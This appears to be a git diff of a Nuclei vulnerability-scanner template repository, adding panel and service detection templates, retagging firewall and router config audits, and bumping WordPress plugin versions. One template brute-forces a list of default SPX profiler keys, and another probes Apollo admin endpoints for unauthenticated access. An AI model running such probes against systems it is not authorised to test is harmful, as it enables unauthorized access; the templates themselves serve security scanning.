+  tags: panel,appwrite,detect
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/images/favicon.png'
+      - '{{BaseURL}}/favicon.png'
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))"
--- a/exposed-panels/aspect-control-panel.yaml
+++ b/exposed-panels/aspect-control-panel.yaml
@ -0,0 +1,27 @@
+id: aspect-control-panel
+
+info:
+  name: ASPECT Control Panel - Detect
+  author: JustaAcat
+  severity: info
+  description: |
+    ASPECT Control login Panel was detected.
+  metadata:
+    verified: "true"
+    shodan-query: http.favicon.hash:1011076161
+  tags: panel,aspect,login
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - <title>ASPECT Control Panel</title>
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/prometheus-metrics.yaml
+++ b/exposures/configs/prometheus-metrics.yaml
@ -2,7 +2,7 @@ id: prometheus-metrics

 info:
  name: Prometheus Metrics - Detect
-  author: dhiyaneshDK, philippedelteil
+  author: dhiyaneshDK,philippedelteil
  severity: medium
  description: Prometheus metrics page was detected.
  classification:
@ -29,6 +29,12 @@ requests:
          - 'process_start_time_seconds'
        condition: or

+      - type: word
+        part: body
+        words:
+          - "lvm_"
+        negative: true
+
      - type: status
        status:
          - 200
--- a/file/audit/cisco/configure-aaa-service.yaml
+++ b/file/audit/cisco/configure-aaa-service.yaml
@ -8,7 +8,7 @@ info:
      Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices.
  reference:
    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/configure-service-timestamps-debug.yaml
+++ b/file/audit/cisco/configure-service-timestamps-debug.yaml
@ -8,7 +8,7 @@ info:
      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
  reference:
    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml
+++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
@ -8,7 +8,7 @@ info:
      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
  reference:
    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/disable-ip-source-route.yaml
+++ b/file/audit/cisco/disable-ip-source-route.yaml
@ -8,7 +8,7 @@ info:
      Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled.
  reference:
    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/disable-pad-service.yaml
+++ b/file/audit/cisco/disable-pad-service.yaml
@ -8,7 +8,7 @@ info:
      To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service.
  reference:
    - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/enable-secret-for-password-user-and-.yaml
+++ b/file/audit/cisco/enable-secret-for-password-user-and-.yaml
@ -8,7 +8,7 @@ info:
      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
  reference:
    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
+  tags: cisco,config-audit,cisco-switch,file,router

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/cisco/logging-enable.yaml
+++ b/file/audit/cisco/logging-enable.yaml
@ -8,7 +8,7 @@ info:
      Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices.
  reference:
    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
-  tags: cisco,config-audit,cisco-switch
+  tags: cisco,config-audit,cisco-switch,file

 file:
  - extensions:
@ -23,4 +23,4 @@ file:

      - type: word
        words:
-          - "configure terminal"
+          - "configure terminal"
--- a/file/audit/fortigate/auto-usb-install.yaml
+++ b/file/audit/fortigate/auto-usb-install.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
--- a/file/audit/fortigate/heuristic-scan.yaml
+++ b/file/audit/fortigate/heuristic-scan.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -25,4 +25,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/inactivity-timeout.yaml
+++ b/file/audit/fortigate/inactivity-timeout.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/maintainer-account.yaml
+++ b/file/audit/fortigate/maintainer-account.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/password-policy.yaml
+++ b/file/audit/fortigate/password-policy.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
+  tags: fortigate,config,audit,file,firewall

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/remote-auth-timeout.yaml
+++ b/file/audit/fortigate/remote-auth-timeout.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/scp-admin.yaml
+++ b/file/audit/fortigate/scp-admin.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/fortigate/strong-ciphers.yaml
+++ b/file/audit/fortigate/strong-ciphers.yaml
@ -6,7 +6,7 @@ info:
  severity: info
  description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
+  tags: audit,config,file,firewall,fortigate

 file:
  - extensions:
@ -24,4 +24,4 @@ file:
          - "config system"
          - "config router"
          - "config firewall"
-        condition: or
+        condition: or
--- a/file/audit/pfsense/known-default-account.yaml
+++ b/file/audit/pfsense/known-default-account.yaml
@ -11,7 +11,7 @@ info:
    - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
  remediation: |
    Deletes the known default accounts configured.
-  tags: firewall,config,audit,pfsense
+  tags: audit,config,file,firewall,pfsense

 file:
  - extensions:
--- a/file/bash/bash-scanner.yaml
+++ b/file/bash/bash-scanner.yaml
@ -8,7 +8,7 @@ info:
  reference:
    - https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/
    - https://phoenixnap.com/kb/dangerous-linux-terminal-commands
-  tags: bash,shell,sh
+  tags: bash,file,shell,sh

 file:
  - extensions:
--- a/helpers/wordpress/plugins/ad-inserter.txt
+++ b/helpers/wordpress/plugins/ad-inserter.txt
@ -1 +1 @@
-2.7.27
+2.7.28
--- a/helpers/wordpress/plugins/advanced-custom-fields.txt
+++ b/helpers/wordpress/plugins/advanced-custom-fields.txt
@ -1 +1 @@
-6.1.3
+6.1.4
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@ -1 +1 @@
-4.3.4.1
+4.3.5.1
--- a/helpers/wordpress/plugins/antispam-bee.txt
+++ b/helpers/wordpress/plugins/antispam-bee.txt
@ -1 +1 @@
-2.11.2
+2.11.3
--- a/helpers/wordpress/plugins/astra-sites.txt
+++ b/helpers/wordpress/plugins/astra-sites.txt
@ -1 +1 @@
-3.2.0
+3.2.1
--- a/helpers/wordpress/plugins/child-theme-configurator.txt
+++ b/helpers/wordpress/plugins/child-theme-configurator.txt
@ -1 +1 @@
-2.6
+2.6.2
--- a/helpers/wordpress/plugins/enable-media-replace.txt
+++ b/helpers/wordpress/plugins/enable-media-replace.txt
@ -1 +1 @@
-4.1.0
+4.1.1
--- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt
+++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt
@ -1 +1 @@
-3.0.17
+3.0.18
--- a/helpers/wordpress/plugins/forminator.txt
+++ b/helpers/wordpress/plugins/forminator.txt
@ -1 +1 @@
-1.22.1
+1.23.3
--- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
+++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
@ -1 +1 @@
-7.14.1
+7.14.2
--- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt
+++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt
@ -1 +1 @@
-8.14.0
+8.14.1
--- a/helpers/wordpress/plugins/google-site-kit.txt
+++ b/helpers/wordpress/plugins/google-site-kit.txt
@ -1 +1 @@
-1.96.0
+1.98.0
--- a/helpers/wordpress/plugins/google-sitemap-generator.txt
+++ b/helpers/wordpress/plugins/google-sitemap-generator.txt
@ -1 +1 @@
-4.1.8
+4.1.9
--- a/helpers/wordpress/plugins/kadence-blocks.txt
+++ b/helpers/wordpress/plugins/kadence-blocks.txt
@ -1 +1 @@
-3.0.32
+3.0.33
--- a/helpers/wordpress/plugins/leadin.txt
+++ b/helpers/wordpress/plugins/leadin.txt
@ -1 +1 @@
-10.1.13
+10.1.16
--- a/helpers/wordpress/plugins/mailpoet.txt
+++ b/helpers/wordpress/plugins/mailpoet.txt
@ -1 +1 @@
-4.11.0
+4.11.1
--- a/helpers/wordpress/plugins/ninja-forms.txt
+++ b/helpers/wordpress/plugins/ninja-forms.txt
@ -1 +1 @@
-3.6.20
+3.6.21
--- a/helpers/wordpress/plugins/pixelyoursite.txt
+++ b/helpers/wordpress/plugins/pixelyoursite.txt
@ -1 +1 @@
-9.3.5
+9.3.6
--- a/helpers/wordpress/plugins/polylang.txt
+++ b/helpers/wordpress/plugins/polylang.txt
@ -1 +1 @@
-3.3.2
+3.3.3
--- a/helpers/wordpress/plugins/post-types-order.txt
+++ b/helpers/wordpress/plugins/post-types-order.txt
@ -1 +1 @@
-2.0.2
+2.0.5
--- a/helpers/wordpress/plugins/pretty-link.txt
+++ b/helpers/wordpress/plugins/pretty-link.txt
@ -1 +1 @@
-3.4.0
+3.4.1
--- a/helpers/wordpress/plugins/really-simple-ssl.txt
+++ b/helpers/wordpress/plugins/really-simple-ssl.txt
@ -1 +1 @@
-6.2.3
+6.2.4
--- a/helpers/wordpress/plugins/so-widgets-bundle.txt
+++ b/helpers/wordpress/plugins/so-widgets-bundle.txt
@ -1 +1 @@
-1.47.1
+1.48.0
--- a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt
+++ b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt
@ -1 +1 @@
-9.0.14
+9.0.15
--- a/helpers/wordpress/plugins/sucuri-scanner.txt
+++ b/helpers/wordpress/plugins/sucuri-scanner.txt
@ -1 +1 @@
-1.8.37
+1.8.39
--- a/helpers/wordpress/plugins/tablepress.txt
+++ b/helpers/wordpress/plugins/tablepress.txt
@ -1 +1 @@
-2.1
+2.1.1
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@ -1 +1 @@
-2.4.1
+2.4.2
--- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
+++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
@ -1 +1 @@
-7.2.0
+7.3.0
--- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt
+++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt
@ -1 +1 @@
-3.5.1
+3.5.2
--- a/helpers/wordpress/plugins/woocommerce.txt
+++ b/helpers/wordpress/plugins/woocommerce.txt
@ -1 +1 @@
-7.5.1
+7.6.0
--- a/helpers/wordpress/plugins/wordpress-seo.txt
+++ b/helpers/wordpress/plugins/wordpress-seo.txt
@ -1 +1 @@
-20.4
+20.5
--- a/helpers/wordpress/plugins/wp-user-avatar.txt
+++ b/helpers/wordpress/plugins/wp-user-avatar.txt
@ -1 +1 @@
-4.9.0
+4.10.1
--- a/helpers/wordpress/plugins/wpforms-lite.txt
+++ b/helpers/wordpress/plugins/wpforms-lite.txt
@ -1 +1 @@
-1.8.1.1
+1.8.1.2
--- a/helpers/wordpress/plugins/yith-woocommerce-compare.txt
+++ b/helpers/wordpress/plugins/yith-woocommerce-compare.txt
@ -1 +1 @@
-2.24.1
+2.25.0
--- a/misconfiguration/apollo-adminservice-unauth.yaml
+++ b/misconfiguration/apollo-adminservice-unauth.yaml
@ -0,0 +1,43 @@
+id: apollo-adminservice-unauth
+
+info:
+  name: Apollo Admin Service - Unauthenticated Access
+  author: j4vaovo
+  severity: medium
+  description: |
+    ApolloAdminservice was able to be accessed without authentication.
+  reference:
+    - https://landgrey.me/blog/20/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.8
+    cwe-id: CWE-522
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"apollo-adminservice"
+  tags: misconfig,unauth,apollo,apolloadminservice
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/apps"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'appId'
+          - 'orgName'
+          - 'ownerName'
+          - 'dataChangeCreatedBy'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/default-spx-key.yaml
+++ b/misconfiguration/default-spx-key.yaml
@ -0,0 +1,59 @@
+id: default-spx-key
+
+info:
+  name: SPX PHP Profiler - Default Key
+  author: vagnerd
+  severity: high
+  description: |
+    SPX PHP profiler default spx key were discovered.
+  reference:
+    - https://github.com/NoiseByNorthwest/php-spx
+  remediation: |
+    - https://github.com/NoiseByNorthwest/php-spx#security-concern
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: "true"
+  tags: spx-php,debug,misconfig,spx
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?SPX_KEY={{api_key}}&SPX_UI_URI=/"
+
+    attack: batteringram
+    payloads:
+      api_key:
+        - dev
+        - devel
+        - stg
+        - stag
+        - staging
+        - prd
+        - prod
+        - production
+        - test
+        - testing
+        - spx
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>SPX Control Panel</title>'
+          - 'SPX_ENABLED'
+          - "Configuration"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/lvm-exporter-metrics.yaml
+++ b/misconfiguration/lvm-exporter-metrics.yaml
@ -25,8 +25,6 @@ requests:
        part: body
        words:
          - "lvm_"
-          - "promhttp"
-        condition: or

      - type: status
        status:
--- a/misconfiguration/springboot/springboot-env.yaml
+++ b/misconfiguration/springboot/springboot-env.yaml
@ -1,18 +1,19 @@
 id: springboot-env

 info:
-  name: Detect Springboot Env Actuator
+  name: Springboot Env Actuator - Detect
  author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish
  severity: low
  description: Sensitive environment variables may not be masked
-  tags: springboot,exposure
+  tags: misconfig,springboot,env,exposure

-requests:
+http:
  - method: GET
    path:
      - "{{BaseURL}}/env"
      - "{{BaseURL}}/actuator/env"
      - "{{BaseURL}}/actuator;/env;"
+      - "{{BaseURL}}/message-api/actuator/env"

    stop-at-first-match: true
    matchers-condition: and
--- a/network/enumeration/beanstalk-service.yaml
+++ b/network/enumeration/beanstalk-service.yaml
@ -0,0 +1,34 @@
+id: beanstalk-service
+
+info:
+  name: Beanstalk Service - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Beanstalk is a simple, fast work queue. Its interface is generic, but was originally designed for reducing the latency of page views in high-volume web applications by running time-consuming tasks asynchronously.
+  reference:
+    - https://jhadiary.wordpress.com/2016/05/18/beanstalk-helping-commands/
+  metadata:
+    verified: "true"
+    shodan-query: port:11300 "cmd-peek"
+  tags: network,beanstalk,detect,enum
+
+tcp:
+  - inputs:
+      - data: "stats\r\n"
+        read: 8
+
+    host:
+      - "{{Host}}:11300"
+
+    matchers:
+      - type: word
+        part: raw
+        words:
+          - "OK"
+
+    extractors:
+      - type: regex
+        name: stats
+        regex:
+          - '([a-z-A-Z: 0-9]+)'
--- a/osint/imgbb.yaml
+++ b/osint/imgbb.yaml
@ -0,0 +1,31 @@
+id: imgbb
+
+info:
+  name: ImgBB User Name Information - Detect
+  author: cheesymoon
+  severity: info
+  description: ImgBB user name information check was conducted.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-image,imgbb
+
+self-contained: true
+http:
+  - method: GET
+    path:
+      - "https://{{user}}.imgbb.com"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Most recent"
+          - "Followers"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/osint/rubygems.yaml
+++ b/osint/rubygems.yaml
@ -0,0 +1,31 @@
+id: rubygems
+
+info:
+  name: RubyGems User Name Information - Detect
+  author: cheesymoon
+  description: RubyGems.org user name information check was conducted.
+  severity: info
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-social,rubygems
+
+self-contained: true
+http:
+  - method: GET
+    path:
+      - "https://rubygems.org/profiles/{{user}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Total gems"
+          - "RubyGems"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/technologies/wordpress/plugins/google-sitemap-generator.yaml
@ -1,7 +1,7 @@
 id: wordpress-google-sitemap-generator

 info:
-  name: XML Sitemaps Detection
+  name: Sitemap Generator for Google Detection
  author: ricardomaia
  severity: info
  reference:
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@ -2,12 +2,12 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
 CONTRIBUTING.md:b3dbbd3a35dd55d57ddbe460e18407806afeeab0
 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
 PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
-README.md:0b8f62b12f98529fcec3adbbdf4bd95b9cfa20f5
+README.md:1b721e95d2d5ad837d843383ae86461640643f71
 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
-TEMPLATES-STATS.json:056fd1c996028663f4fca07e2bb7f174488cdecc
-TEMPLATES-STATS.md:7e737a36670c09c41db601c810296d43308aae22
-TOP-10.md:f36559fe4a7237dee0543f14debf0b635224a02b
-cnvd/2017/CNVD-2017-03561.yaml:0889bb01b6325f803f0a07fe1ecabb2dad32f20a
+TEMPLATES-STATS.json:f5d8e77d13d8d3aecf5a5e4acf171664201ad404
+TEMPLATES-STATS.md:44f1de6b384a6a5551e3874739cdcdb6393518d3
+TOP-10.md:c3e53eb44cb35fcbd70ac1c7029e7bdb8a6753d8
+cnvd/2017/CNVD-2017-03561.yaml:0849a81e4462b1e839ee7911f9c04eb36606adc9
 cnvd/2018/CNVD-2018-13393.yaml:0e1259302bf311ee27e46c13d2c59ef87c994ba4
 cnvd/2019/CNVD-2019-01348.yaml:9c6ccc5494fce2575cfab51a1f9e439c28efc491
 cnvd/2019/CNVD-2019-06255.yaml:26b49721268b065f4721d8f5b46dcee3aebcbb8f
@ -235,7 +235,7 @@ cves/2013/CVE-2013-5979.yaml:990d2fc6a8c89aba9627631392421035b85cfdf6
 cves/2013/CVE-2013-6281.yaml:78341c83a9f816f4dfd6c6adc22edfbb28bf24ac
 cves/2013/CVE-2013-7091.yaml:98fc5a4040d53de5a3220e14c8aa69dbe820625b
 cves/2013/CVE-2013-7240.yaml:d0d71afd6dc3b75831bd592678a90071b10e8edc
-cves/2013/CVE-2013-7285.yaml:ac9fb118d66d23dd566fd7745259db7caf6ceb5f
+cves/2013/CVE-2013-7285.yaml:ad01fd4ba182d6036e19b7662dcd284f8814c3ef
 cves/2014/CVE-2014-10037.yaml:d1050e52c59bddaf7279c92907cc11f9a432e77c
 cves/2014/CVE-2014-1203.yaml:73457ec47c8dadeb706d86520d103d2d6fe0c0ce
 cves/2014/CVE-2014-2321.yaml:c0ff6ee66b113f65f4b04aafdd005ae696ef471a
@ -424,6 +424,7 @@ cves/2017/CVE-2017-15715.yaml:271b3e3279ef54946fa788343067228f1926aa74
 cves/2017/CVE-2017-15944.yaml:11add7ea60d2417b3e000404bb250e2203a8dc65
 cves/2017/CVE-2017-16806.yaml:9a83f14f21323ce660fd99d701912ae88d91a6ff
 cves/2017/CVE-2017-16877.yaml:71a541684c4a89c4095a4299f29b019c30307d39
+cves/2017/CVE-2017-16894.yaml:4221a04d991df17d2fd90f3d4a0eedf6c579c9e4
 cves/2017/CVE-2017-17043.yaml:3143d6057553b5350c8a3baf7b915cf99d9deee0
 cves/2017/CVE-2017-17059.yaml:2f740a48a4bd5eabee55a7c4decd0bbb12dca462
 cves/2017/CVE-2017-17451.yaml:c2a8888758547f260cf6c7bf16624760025cf45d
@ -886,9 +887,9 @@ cves/2020/CVE-2020-25864.yaml:b2eb2e5b54e7f1538f4294c8d2c1e6fb300ab17f
 cves/2020/CVE-2020-26073.yaml:74288043c8c87c2d8d522c7bc98e8811d391b69a
 cves/2020/CVE-2020-26153.yaml:2de99263aab06bc853e0ed2b6cbaf1cb235d0e2e
 cves/2020/CVE-2020-26214.yaml:6fb89dbfc82b612267af1c3e00eb0abc8b3a2b93
-cves/2020/CVE-2020-26217.yaml:2948a6d69f0bf533d7429845a2c1c57ca4cd3bcf
+cves/2020/CVE-2020-26217.yaml:50d2db44e76a47d8339eb938250f7f1453962b3e
 cves/2020/CVE-2020-26248.yaml:3f5c608a2d86ca081ba2daa78a59857e9587b61c
-cves/2020/CVE-2020-26258.yaml:04e1c7b7660f8853afd60823d12cde9a645175d7
+cves/2020/CVE-2020-26258.yaml:17bce57705c638bddf97e023cec040a66500a146
 cves/2020/CVE-2020-26413.yaml:5e6c17a1b4453081076915a3b079a84402822838
 cves/2020/CVE-2020-26876.yaml:7b8d26335ddb584f5b0b6a4aedba839e9557183b
 cves/2020/CVE-2020-26919.yaml:d670e83915d84c8b115fd19bc8579ce1bf64eeee
@ -1013,9 +1014,9 @@ cves/2021/CVE-2021-21087.yaml:9c78bcc59500d6388d520b3e7beb59959d068148
 cves/2021/CVE-2021-21234.yaml:96fe14109f234934752ea823d8b37c3805366b91
 cves/2021/CVE-2021-21287.yaml:cac510096921f8d46c3803c5d662db7b3cf3d36d
 cves/2021/CVE-2021-21307.yaml:269412c9590372fd775477315540572ece0b9d9e
-cves/2021/CVE-2021-21311.yaml:641a31650c143f93d35d29640b54992cf19cc7c2
+cves/2021/CVE-2021-21311.yaml:f74cf9dc6a302e3792ad2335ecf0f9b0d7246273
 cves/2021/CVE-2021-21315.yaml:b449c6409e6c47d117b1ff10e4810a3446ee0247
-cves/2021/CVE-2021-21345.yaml:37a7316c00aee55861ca84d4e377bb3ca4e151d1
+cves/2021/CVE-2021-21345.yaml:ba7167a5f698ffb3dda34f63373026c43646c79a
 cves/2021/CVE-2021-21351.yaml:9e4f2f94ccc82fc1a45ffad0b66eca0734ab1d19
 cves/2021/CVE-2021-21389.yaml:f65c6cfee2496381870dc582fdfe7726f677d17b
 cves/2021/CVE-2021-21402.yaml:77f35f5902d93ed9bf2100f077f9cc0204d3ca4e
@ -1185,7 +1186,7 @@ cves/2021/CVE-2021-29441.yaml:da9a25f6cedf057a53f9318d25507c1b05012492
 cves/2021/CVE-2021-29442.yaml:ee6f402837662de09ca17b054145faf37cad9299
 cves/2021/CVE-2021-29484.yaml:0ca7710b03f13ab639537956b1cff05ab4f090e9
 cves/2021/CVE-2021-29490.yaml:b217e492e78e2cbe3332bd67fe1421dbc149e04e
-cves/2021/CVE-2021-29505.yaml:30b219968f228cc255cf07c28225d147adedfd3a
+cves/2021/CVE-2021-29505.yaml:3f92ddf11542466aea4e2745a02887ab90cbfdc5
 cves/2021/CVE-2021-29622.yaml:74c10386c9414063c642dae8be841648ac6536b4
 cves/2021/CVE-2021-29625.yaml:2c2c0d7fc6dd44c6e016d47c808bd8e1b9c8d6dc
 cves/2021/CVE-2021-3002.yaml:b0281c085482ff720ad2be1ac12acd2436bb0fda
@ -1242,6 +1243,7 @@ cves/2021/CVE-2021-34621.yaml:5a83b49fb13d5cd8da56731897971e645e160e02
 cves/2021/CVE-2021-34640.yaml:d42b422e2304fdc3b6cf7fe3dd34cde4a3bad13e
 cves/2021/CVE-2021-34643.yaml:dfa90f74875669db2b3817f0b0dfcc204d2d4b1a
 cves/2021/CVE-2021-34805.yaml:9700462801fe4fded421b85a42ed17ced3ef091d
+cves/2021/CVE-2021-35250.yaml:9337121e5c824bc1793ce80d6997d021c4e8e014
 cves/2021/CVE-2021-35265.yaml:8a130bfa6ffa1bdc9584a72159cc293dcc6dbd42
 cves/2021/CVE-2021-35336.yaml:9210c944b7ad46229d214e08bbb777c8d56b677d
